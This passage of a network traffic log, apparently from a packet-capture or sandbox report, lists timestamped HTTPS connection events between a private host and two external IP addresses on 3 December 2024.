                                                                                                                      Dec 3, 2024 08:55:39.180985928 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.181035042 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.181518078 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.184976101 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.185064077 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.185107946 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.186847925 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.187048912 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.187072992 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.187419891 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.188905001 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.188973904 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.189012051 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.202023029 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.202069998 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.202482939 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.203265905 CET50005443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.203282118 CET44350005196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.227358103 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.235337019 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.236155033 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.236187935 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.270787001 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.281615019 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.324759007 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.324852943 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.327802896 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.345643997 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.345653057 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.346163988 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.346170902 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.348017931 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.348041058 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.348129034 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.348155975 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.348440886 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.348511934 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.350528002 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.350593090 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.350792885 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.350877047 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.350951910 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.350999117 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.391335011 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.395332098 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.397139072 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.397223949 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.397434950 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.397506952 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.397527933 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.397538900 CET49989443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.397543907 CET4434998913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.402260065 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.402311087 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.402388096 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.402595997 CET50006443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.402611971 CET4435000613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.493666887 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.496901989 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.500767946 CET49988443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.500922918 CET49988443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.500922918 CET49988443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.500941038 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.500951052 CET4434998813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.504045010 CET50007443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.504106998 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.504185915 CET50007443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.504437923 CET50007443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.504470110 CET4435000713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.652066946 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.655960083 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.655978918 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.656987906 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.657049894 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.657373905 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.657429934 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.657557011 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.657562971 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.677800894 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.680955887 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.680984974 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.682127953 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.682199001 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.684201956 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.684266090 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.684359074 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.686677933 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.688843966 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.688851118 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.689923048 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.689992905 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.690258026 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.690318108 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.690378904 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.696813107 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.700853109 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.701756954 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.701770067 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.703136921 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.703217983 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.703520060 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.703583002 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.703660011 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.724159002 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.725985050 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.726537943 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.726600885 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.727025032 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.727039099 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.727231026 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.727308035 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.727334976 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.727345943 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.727360964 CET49990443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.727365017 CET4434999013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.731327057 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.731586933 CET50008443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.731623888 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.732525110 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.732551098 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.732567072 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.732574940 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.732580900 CET50008443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.733031988 CET50008443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:39.733042955 CET4435000813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.747348070 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.748483896 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.748492002 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:39.778728962 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.780179977 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:39.795223951 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.112590075 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112626076 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112637043 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112683058 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112709999 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.112763882 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112813950 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.112870932 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112926960 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.112931013 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112938881 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112952948 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112960100 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.112994909 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.113019943 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.113035917 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.134787083 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.134809017 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.134815931 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.134876966 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.134893894 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.143239975 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.143306971 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.143307924 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.143357992 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.157011032 CET49992443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.157042980 CET44349992196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.157433987 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.161509037 CET49993443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.161524057 CET44349993196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.162389040 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.162412882 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.162475109 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.163539886 CET50009443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.163549900 CET44350009196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.173228025 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.173258066 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.173330069 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.173353910 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.173403978 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.173573017 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.173623085 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.173686028 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.190476894 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.194832087 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.194883108 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.194886923 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.194938898 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.219974995 CET49994443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.220043898 CET44349994196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.225284100 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.225301027 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.225312948 CET49996443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.225318909 CET4434999613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.238236904 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.239218950 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.239278078 CET4435001013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.239343882 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.239701033 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.239732027 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.239929914 CET50010443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.239942074 CET4435001013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.240089893 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.240849018 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.240930080 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.241025925 CET50000443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.250685930 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.250730038 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.250802994 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.251102924 CET50011443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.251125097 CET44350011196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.276685953 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.276699066 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.276786089 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.287338972 CET44350000196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.294460058 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.294466972 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.294563055 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.294569016 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.294615984 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.394676924 CET4435000113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.440949917 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.452770948 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.478041887 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.478064060 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.478070974 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.478144884 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.478163004 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.489986897 CET49991443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.490010977 CET44349991196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.502075911 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.502104998 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.502182961 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.502584934 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.521295071 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.521295071 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.521322966 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.521332026 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.521393061 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.521497011 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.521497965 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.521539927 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.524283886 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.524307013 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.525217056 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.525300026 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.525674105 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.538909912 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.538938046 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.538945913 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.538969040 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.539014101 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.539021015 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.539175034 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.547100067 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.547126055 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.547152996 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.547161102 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.547166109 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.547173023 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.547183990 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.547216892 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.547224045 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.547260046 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.547286987 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.555044889 CET50012443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.555059910 CET44350012196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.555587053 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.555777073 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.555866003 CET44350003196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.567795038 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.567805052 CET4435000113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.568311930 CET50001443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:40.568317890 CET4435000113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.606856108 CET50003443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.706024885 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.706034899 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.706110001 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.721560001 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.721566916 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.721648932 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.727479935 CET49995443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.727514982 CET44349995196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.732952118 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.732986927 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.733062029 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.733815908 CET49998443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.733840942 CET44349998196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.734226942 CET49997443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.734241962 CET44349997196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.734653950 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.734707117 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.734764099 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.736591101 CET50013443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.736604929 CET44350013196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.738238096 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.738298893 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.738303900 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.738320112 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.738370895 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.739423037 CET50014443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.739447117 CET44350014196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.740542889 CET49999443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.740550041 CET44349999196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.759891033 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.759910107 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.759974957 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.760627031 CET50015443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.760641098 CET44350015196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.764624119 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.764656067 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.764710903 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.765095949 CET50016443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.765106916 CET44350016196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.768122911 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.768214941 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.768294096 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.768446922 CET50017443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:40.768477917 CET44350017196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.892529011 CET4435000113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.896198034 CET4435000113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:40.896367073 CET50001443192.168.2.413.107.246.63
